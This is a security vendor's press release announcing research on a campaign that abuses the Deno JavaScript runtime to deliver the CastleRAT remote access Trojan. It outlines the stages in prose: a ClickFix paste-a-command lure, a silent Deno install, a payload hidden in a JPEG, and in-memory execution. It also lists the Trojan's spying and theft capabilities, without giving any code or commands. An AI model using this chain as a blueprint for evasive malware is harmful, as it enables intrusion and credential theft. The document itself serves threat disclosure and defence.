ThreatDown, the corporate business unit of Malwarebytes, today published research documenting what researchers believe to be the first documented case of attackers abusing the Deno JavaScript runtime as a malware execution framework. The attack was uncovered by ThreatDown’s Endpoint Detection and Response (EDR) team.
The multi-stage infection chain ultimately installs CastleRAT, a remote access Trojan capable of credential theft, surveillance and remote command execution. The malware executes entirely in system memory and never appears on disk as a traditional executable file.
The campaign highlights an evolution in attacker tradecraft. Rather than relying on malicious binaries, the attackers leveraged Deno—a legitimate, code-signed JavaScript runtime widely used by developers—to execute obfuscated scripts that retrieve additional payloads. Because the activity occurs inside a trusted process, traditional antivirus tools that rely on file-based scanning may fail to detect it.
Threat actors have long abused built-in operating system tools in “living-off-the-land” attacks, but the use of a developer runtime like Deno represents a new expansion of that technique.
“This is the first time we’ve seen attackers co-opt the Deno runtime in the wild, and it signals a broader shift in how threat actors think about evasion,” said Marco Giuliani, Vice President, Head of Research at ThreatDown. “Deno is legitimate software that security products trust. By exploiting that trust, attackers can execute malicious code in ways many endpoint defenses aren’t designed to monitor.”
The research was led by Lorenzo Corazzi, Malware Research Engineer at ThreatDown.
How the Attack Works
ThreatDown’s research details a multi-phase infection chain designed for maximum stealth. The attackers employ a three-step process to bypass traditional endpoint defenses:
- Phase 1: Social Engineering via “ClickFix.” The attack begins with a ClickFix lure—a fake browser error or CAPTCHA prompt that instructs the user to copy and paste a command. This effectively bypasses web security filters because the user voluntarily executes the initial script themselves.
- Phase 2: First-of-Its-Kind Deno Abuse The initial script silently downloads and installs Deno, a legitimate, widely used and code-signed JavaScript runtime. By using Deno as a Trojan horse to execute obfuscated code, the attack inherits the privileges of trusted processes and evades behavioral alarms.
- Phase 3: Steganography and In-Memory Execution The attackers hide the encrypted final payload inside a seemingly innocuous JPEG image. A disguised script decodes the image and injects the malware directly into system memory. The payload never touches the hard drive as an executable file, rendering traditional file-scanning antivirus engines useless.
CastleRAT Capabilities: Total Machine Control
Once established in memory, CastleRAT takes total control of the compromised machine. Hiding behind legitimate processes, the malware leverages advanced abuse of low-level Windows APIs to conduct devastating espionage. Key capabilities include:
- Total Espionage & Cryptocurrency Theft: Silent keylogging and clipboard hijacking to steal credentials, passwords and cryptocurrency wallet addresses.
- Audio/Video Surveillance: Covert initialization of the victim’s webcams and microphones for real-time monitoring.
- Invisible Backdoors: Anonymous communication pipes that grant attackers full remote access with no visible console window, coupled with persistence mechanisms to survive system reboots.
ThreatDown detects and blocks this attack chain at multiple stages, identifying its components as Trojan.CastleLoader and Trojan.CastleRAT. Rather than relying on file-based scanning, ThreatDown’s behavioral monitoring analyzes anomalies in process execution and severs communication with command-and-control servers before data is stolen.
Security teams can find indicators of compromise and the full technical analysis on the ThreatDown blog: CastleRAT attack first to abuse Deno JavaScript runtime to evade enterprise security.
